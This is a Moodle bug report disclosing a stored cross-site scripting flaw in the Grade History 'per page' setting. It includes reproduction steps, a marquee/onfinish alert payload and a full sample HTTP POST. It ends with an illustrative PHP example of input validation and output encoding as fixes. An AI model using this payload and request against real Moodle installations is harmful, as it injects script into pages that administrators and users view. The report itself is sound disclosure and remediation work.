Bug
Resolution: Fixed
Minor
3.7.4, 3.8.1, 3.9
MOODLE_37_STABLE, MOODLE_38_STABLE, MOODLE_39_STABLE
MOODLE_37_STABLE, MOODLE_38_STABLE
MDL-68061-master
International 3.9 - Sprint 6
The application is vulnerable to a Stored Cross-Site Scripting (XSS) attack. You can find the reproduction steps and a sample HTTP request below.
Tested Moodle version: 3.8.1+ (the latest)
Tested browser version: Firefox 73.0.1
Vulnerable parameter: 's__grade_report_historyperpage' in the Grade History module (/admin/settings.php?section=gradereporthistory)
Tested payload: <marquee loop=1 width=0 onfinish=alert('Stored-XSS-Test')>
Steps to reproduce:
1- Go to the 'Grade History' module (/admin/settings.php?section=gradereporthistory)
2- Replace the value of the 's__grade_report_historyperpage' parameter in the HTTP POST request with the said payload (the HTTP request is attached below).
3- Go to any log page to observe the execution, e.g. the 'Live logs' page (report/loglive/index.php)
Sample HTTP Request:
POST /admin/settings.php?section=gradereporthistory HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
Origin: <REDACTED>
DNT: 1
Connection: close
Referer: https://<REDACTED>/admin/settings.php?section=gradereporthistory
Cookie: MoodleSession=4i<REDACTED>gr
Upgrade-Insecure-Requests: 1

section=gradereporthistory&action=save-settings&sesskey=Cr<REDACTED>id&return=&s__grade_report_historyperpage=%3Cmarquee+loop%3D1+width%3D0+onfinish%3Dalert%28%27Stored-XSS-Test%27%29%3E
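The report comes down to a numeric "per page" setting accepting arbitrary markup, and a log page later rendering the stored value as HTML. The stand-alone PHP below is an added example, not Moodle's code or its fix; `clean_perpage_setting()`, `render_log_cell()` and the 1 to 5000 range are hypothetical names and values chosen for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not a Moodle function): accept a "rows per page"
// setting only if it is a plain integer in range; null signals rejection.
function clean_perpage_setting(string $raw, int $min = 1, int $max = 5000): ?int
{
    $value = filter_var(trim($raw), FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $value === false ? null : $value;
}

// Hypothetical helper (not a Moodle function): encode any stored value before
// placing it in an HTML table cell, so markup saved by an older or unvalidated
// writer is displayed as text instead of being parsed by the browser.
function render_log_cell(string $stored): string
{
    return '<td>' . htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// Form body copied from the sample request in the report (sesskey is already
// redacted there).
$body = 'section=gradereporthistory&action=save-settings&sesskey=Cr<REDACTED>id&return='
      . '&s__grade_report_historyperpage='
      . '%3Cmarquee+loop%3D1+width%3D0+onfinish%3Dalert%28%27Stored-XSS-Test%27%29%3E';
parse_str($body, $post);
$raw = $post['s__grade_report_historyperpage'] ?? '';

// Control 1, on write: the reported value next to constructed sample values.
foreach ([$raw, '50', ' 25 ', '0', '50abc'] as $candidate) {
    $clean = clean_perpage_setting($candidate);
    printf("%-66s => %s\n", json_encode($candidate),
        $clean === null ? 'rejected' : "stored as $clean");
}

// Control 2, on read: even if the raw string had reached storage, the log
// view emits it with <, >, quotes and & encoded.
echo render_log_cell($raw), "\n";
```

Either control alone would have stopped the behaviour described in the report; applying both means a missed type check on one setting does not become script execution on every page that displays the stored value.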